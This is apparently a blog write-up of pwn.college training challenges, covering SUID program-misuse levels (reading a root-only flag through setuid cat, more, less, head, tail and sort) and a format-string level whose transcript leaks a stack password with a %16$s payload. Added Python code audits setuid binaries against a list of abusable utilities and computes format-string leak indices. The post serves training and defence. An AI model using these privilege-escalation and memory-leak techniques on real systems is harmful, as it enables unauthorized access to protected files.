PwnCollege

cvestone · published 2024-08-18 · 296 reads · 1592 words · estimated reading time: 7 minutes


Optional Refreshers

Program Misuse

(The whole series uses the same program, babysuid.)

level 1 ~ level 6

Lets you directly read the flag!

level 1:
The challenge directory contains the following files:
[screenshot: listing of the challenge directory]
.config:
[screenshot: contents of .config]
This configuration file is not very interesting: it just records which level this is, and each level has its own number.
babysuid source:

#!/opt/pwn.college/python

import shutil
import socket
import sys
import os

CATEGORIZED_CHALS = [
    [
        "exposes you to very simple programs that let you directly read the flag",
        [ "cat", "more", "less", "tail", "head", "sort" ]
    ],
    [
        "shows you that an over-privileged editor is a very powerful tool, indeed",
        [ "vim", "emacs", "nano" ]
    ],
    [
        "require you to understand their output to derive the flag from it",
        [ "rev", "od", "hd", "xxd", "base32", "base64", "split" ]
    ],
    [
        "force you to understand different archive formats",
        [ "gzip", "bzip2", "zip", "tar", "ar", "cpio", "genisoimage" ]
    ],
    [
        "will enable you to read flags by making them execute other commands",
        [ "env", "find", "make", "nice", "timeout", "stdbuf", "setarch", "watch", "socat" ]
    ],
    [
        "will require some light programming to read the flag.",
        [ "whiptail", "awk", "sed", "ed" ]
    ],
    [
        "let you get the flag by doing tricks with permissions",
        [ "chown", "chmod", "cp", "mv" ]
    ],
    [
        "let you read the flag because they let you program anything",
        [ "perl", "python", "ruby", "bash" ]
    ],
    [
        "just straight up weren't designed to let you read files",
        [ "date", "dmesg", "wc", "gcc", "as", "wget" ]
    ],
    # todo: consider custom stuff that's abusable via path and such for the future
    [
        "show you how dangerous it is to allow users to load their own code as plugins into the program (but figuring out how is the hard part!)",
        [ "ssh-keygen" ]
    ]
]

ALL_CHALS = [ (c,b) for c,bl in CATEGORIZED_CHALS for b in bl ]

with open("/challenge/.config") as f:
    level = int(f.read())

concept, utility = ALL_CHALS[level - 1]

print(f"""
Welcome to {sys.argv[0]} (level {level})!

This challenge is part of a series of programs that
{concept}.

I am setting the SUID bit on the {utility} program (in your PATH at
/challenge/bin/{utility}.) Try to use it to read the flag!

IMPORTANT: make sure to run me (/challenge/babysuid) every time that you
restart this challenge container to make sure that I set the SUID bit!
""".strip())

if not os.path.exists("/challenge/bin"):
    os.makedirs("/challenge/bin")
if not os.path.isfile(f"/challenge/bin/{utility}"):
    assert shutil.copy2(shutil.which(utility), f"/challenge/bin/{utility}")
os.chmod(f"/challenge/bin/{utility}", 0o4755)

Note that the vulnerable program is only created once babysuid has been run:
[screenshot: running /challenge/babysuid]
The banner tells us that the cat in that directory has had its SUID bit set, so we can use this cat to read the flag in the root directory (/challenge/bin is placed on PATH ahead of the system directories, so this cat shadows the default one). We also find that the flag file is readable only by its owner, root:
[screenshot: permissions of /flag]
So the SUID cat runs with the file owner's (root's) effective UID, which is all the privilege escalation we need to read the flag:
[screenshot: reading /flag with the SUID cat]

level 2:
Same files as before, only the vulnerable program is now more:
[screenshot: running babysuid for level 2]
Check the usage; the -p option clears the screen and then prints the file contents (plain more /flag would do as well):
[screenshot: more -p /flag]

level 3:
Same files as before, only the vulnerable program is now less:
Run less /flag directly:
[screenshot: less /flag]
less also reads the file directly; it just displays it in a pager rather than dumping it to the terminal.

level 4:
Same files as before, only the vulnerable program is now tail:
[screenshot: tail /flag]
tail also reads the file directly; by default it prints the last ten lines (the first ten are head's job), which for a one-line flag is the whole file.

level 5:
Same files as before, only the vulnerable program is now head:
With no options, it prints the first ten lines of the file:
[screenshot: head /flag]

level 6:
Same files as before, only the vulnerable program is now sort:
Although sort exists to sort text by line, like the commands above it reads the whole file and writes its contents out (a one-line file sorts to itself):
[screenshot: sort /flag]
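babysuid does the dangerous thing in one line: it copies a stock utility into /challenge/bin and chmods it to 0o4755, so from then on every user who runs it gets the file owner's effective UID, and levels 1 through 6 show that any utility that can read a file will then read /flag. The following is an added example (my code, not pwn.college's or the post author's) that does the defender's side of the same reasoning: it walks a directory the way find DIR -perm -4000 would, flags setuid files whose names are on the babysuid utility list, marks the ones owned by root as critical, and clears the bit as remediation. The directory argument and the "root" owner name are assumptions for illustration.

```python
#!/usr/bin/env python3
"""Audit a directory for setuid executables that the babysuid series shows
are abusable. Added example, not part of pwn.college or the original post."""
import os
import pwd
import stat

# Flattened from the CATEGORIZED_CHALS table in babysuid: every utility the
# series demonstrates can read (or lead to reading) a root-only file when setuid.
ABUSABLE_UTILITIES = frozenset("""
cat more less tail head sort vim emacs nano rev od hd xxd base32 base64 split
gzip bzip2 zip tar ar cpio genisoimage env find make nice timeout stdbuf setarch
watch socat whiptail awk sed ed chown chmod cp mv perl python ruby bash date
dmesg wc gcc as wget ssh-keygen
""".split())


def owner_name(uid):
    """Map a uid to a user name, falling back to the number for unknown uids."""
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:
        return str(uid)


def find_setuid(directory):
    """Yield (path, owner, mode) for every regular file directly under
    `directory` whose mode carries the setuid bit, like `find -perm -4000`."""
    for entry in sorted(os.scandir(directory), key=lambda e: e.name):
        try:
            st = entry.stat(follow_symlinks=False)
        except FileNotFoundError:
            continue  # raced with a deletion; nothing to report
        if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
            yield entry.path, owner_name(st.st_uid), stat.S_IMODE(st.st_mode)


def audit_setuid(directory, privileged_owner="root"):
    """Return findings for setuid files whose basename is on the abusable list.
    `critical` is True when the owner is the privileged account (assumed to be
    "root" here), i.e. the binary hands any local user that account's file access."""
    findings = []
    for path, owner, mode in find_setuid(directory):
        if os.path.basename(path) in ABUSABLE_UTILITIES:
            findings.append({
                "path": path,
                "owner": owner,
                "mode": oct(mode),
                "critical": owner == privileged_owner,
            })
    return findings


def strip_setuid(path):
    """Remediation: clear the setuid and setgid bits, keep the rest of the mode.
    Returns the resulting permission bits."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    os.chmod(path, mode & ~(stat.S_ISUID | stat.S_ISGID))
    return stat.S_IMODE(os.stat(path).st_mode)


if __name__ == "__main__":
    import sys
    target_dir = sys.argv[1] if len(sys.argv) > 1 else "/challenge/bin"
    for f in audit_setuid(target_dir):
        label = "CRITICAL" if f["critical"] else "warn"
        print(f"{label}: {f['path']} owner={f['owner']} mode={f['mode']}")
```

Run it against /challenge/bin after babysuid has executed and the copied cat (mode 0o4755, owner root) is reported as critical; the list is only a starting point, since the later levels show that almost any setuid binary that can open a file, spawn a process or load code is just as bad.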

level 7 ~ level 9

Shows you that an over-privileged editor is a very powerful tool!

level 7:
Same files as before, only the vulnerable program is now the vim editor:
[screenshot: opening /flag in vim]

level 8:
Same files as before, only the vulnerable program is now the emacs editor:

level 9:
Same files as before, only the vulnerable program is now the nano editor:
[screenshot: opening /flag in nano]

level 10 ~ level 16

Requires you to understand their output to derive the flag from it!

Software Exploitation

Format String Exploits

Exploiting format string vulnerabilities is like a locksmith using a special set of tools to subtly manipulate the inner workings of a lock. It involves delicately inserting custom-crafted sequences into a program's output functions, much like a skilled safecracker tuning into the faint clicks of a safe's mechanism. Each carefully chosen character or specifier in the format string acts like a precise tweak to the internal gears, potentially revealing hidden information or granting control over the system's memory. This technique is a blend of art and science, requiring a deep understanding of the software's architecture and a creative approach to bending its functionalities beyond their intended limits. It's a thrilling intellectual puzzle, unlocking the secrets of a program from the inside out.

Level1.0

┌──(root㉿hunter)-[/media/…/CTF靶场素材/pwncollege/SoftwareExploitation/FormatStringExploits]
└─# checksec babyfmt_level1.0
[*] '/media/cvestone/0F00-E8EA/CTF靶场素材/pwncollege/SoftwareExploitation/FormatStringExploits/babyfmt_level1.0'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

hacker@format-string-exploits~level1-0:/challenge$ ./babyfmt_level1.0 
###
### Welcome to ./babyfmt_level1.0!
###

This challenge reads in some bytes, calls printf on that string, and allows you to perform
a format string attack. Through this series of challenges, you will become painfully familiar
with the concept of Format String Attacks!

This challenge allows you to make a 256-sized format string.

There is a 15-character uppercase secret password hidden on the stack!
If you find it, you will be given the flag!

The secret password is located at 0x7fffe28e6a80 and the stack pointer is located at 0x7fffe28e6a30.
The difference between these addresses is: 10 (80 / 8).
This means, before the printf, the arguments to the format string will look something like:
0x7fffe28e6a80:	[SECRET_PASSWORD]
0x7fffe28e6a78:	[?]
0x7fffe28e6a70:	[?]
0x7fffe28e6a68:	[?]
0x7fffe28e6a60:	[?]
0x7fffe28e6a58:	[?]
0x7fffe28e6a50:	[?]
0x7fffe28e6a48:	[?]
0x7fffe28e6a40:	[?]
0x7fffe28e6a38:	[?]
0x7fffe28e6a30:	[?]
R9:		[?]
R8:		[?]
RCX:		[?]
RDX:		[?]
RSI:		[?]
RDI:		[FORMAT_STRING]
I will now read up to 256 bytes. Send your data!
%16$s
Received 6 bytes!

I will now call printf on your data!

QRVQRXOSWCNGMRU

What is the secret password?
QRVQRXOSWCNGMRU
Correct Password!
pwn.college{MZf8AKQz8RaRnQQpMA92YkGMqNz.dZTM0MDL0kDN1QzW}
### Goodbye!

Analysis: the challenge tells us the password is at 0x7fffe28e6a80 and the stack pointer at 0x7fffe28e6a30, i.e. 0x50 = 80 bytes = 10 stack slots apart. On x86-64 (System V ABI) printf takes its format string in RDI and the next five variadic arguments in RSI, RDX, RCX, R8 and R9, so the first word on the stack (at rsp) is positional argument 6 and the word at rsp + 10 * 8 is argument 6 + 10 = 16. That is why %16$s leaks the password. Note what %s does: printf reads the word in slot 16 and dereferences it as a char *, so the fact that this works tells us slot 16 holds a pointer to the password bytes. Had the bytes themselves been stored in the slot, %16$s would have tried to dereference ASCII as an address and crashed; in that case the leak has to be taken as raw words with %16$lx (and %17$lx for the rest of the 15 characters) and decoded little-endian.
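The index arithmetic above, as an added example in Python (mine, not pwn.college's or the post's): it turns the two addresses the challenge prints into the %N$ index, builds the payload, and also covers the case the transcript did not hit, where the slot holds the password bytes themselves rather than a pointer, so the leak has to be taken as raw %lx words and decoded little-endian. The addresses are the ones from the transcript; the word separator and the "(nil)" handling for %p output are assumptions.

```python
#!/usr/bin/env python3
"""Positional-argument arithmetic for the babyfmt leak, plus decoding of leaks
that come back as raw stack words. Added example, not pwn.college's code."""

# x86-64 System V: printf takes its format string in RDI and the next five
# variadic arguments in RSI, RDX, RCX, R8, R9. Argument 6 is therefore the
# 8-byte word at RSP when printf is entered.
REGISTER_ARGS_X86_64 = 6
WORD = 8


def stack_slot_index(target, rsp, reg_args=REGISTER_ARGS_X86_64):
    """Positional index (the N in %N$...) of the stack word at `target`."""
    if target < rsp or (target - rsp) % WORD:
        raise ValueError("target must be a word-aligned address at or above rsp")
    return reg_args + (target - rsp) // WORD


def pointer_leak_payload(index):
    """Use when the slot holds a pointer to the data: printf dereferences it."""
    return f"%{index}$s".encode()


def word_leak_payload(index, nwords, sep="|"):
    """Use when the slot holds the data bytes themselves: dump each word as hex.
    The separator (assumed here) lets the output be split unambiguously."""
    return sep.join(f"%{i}$lx" for i in range(index, index + nwords)).encode()


def words_needed(nbytes):
    """Number of 8-byte words covering `nbytes` of data (ceiling division)."""
    return -(-nbytes // WORD)


def decode_word_leak(output, sep="|"):
    """Rebuild the bytes that %lx / %p dumped: each token is one word, printed
    most-significant digit first, so it is converted back little-endian.
    Accepts bare hex, 0x-prefixed hex and glibc's "(nil)" for a NULL %p."""
    data = b""
    for token in output.strip().split(sep):
        token = token.strip()
        value = 0 if token == "(nil)" else int(token, 16)
        data += value.to_bytes(WORD, "little")
    return data.rstrip(b"\x00")


if __name__ == "__main__":
    # Addresses from the level 1.0 transcript.
    secret, rsp = 0x7FFFE28E6A80, 0x7FFFE28E6A30
    idx = stack_slot_index(secret, rsp)
    print("index:", idx, "payload:", pointer_leak_payload(idx))
    print("fallback if the slot holds bytes:", word_leak_payload(idx, words_needed(15)))
```

If the fallback payload is used, feed printf's output straight into decode_word_leak; because %lx drops leading zeros, a word whose top bytes are NUL still decodes correctly, and the trailing NULs of a short final word are stripped.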

Last updated 2024-08-18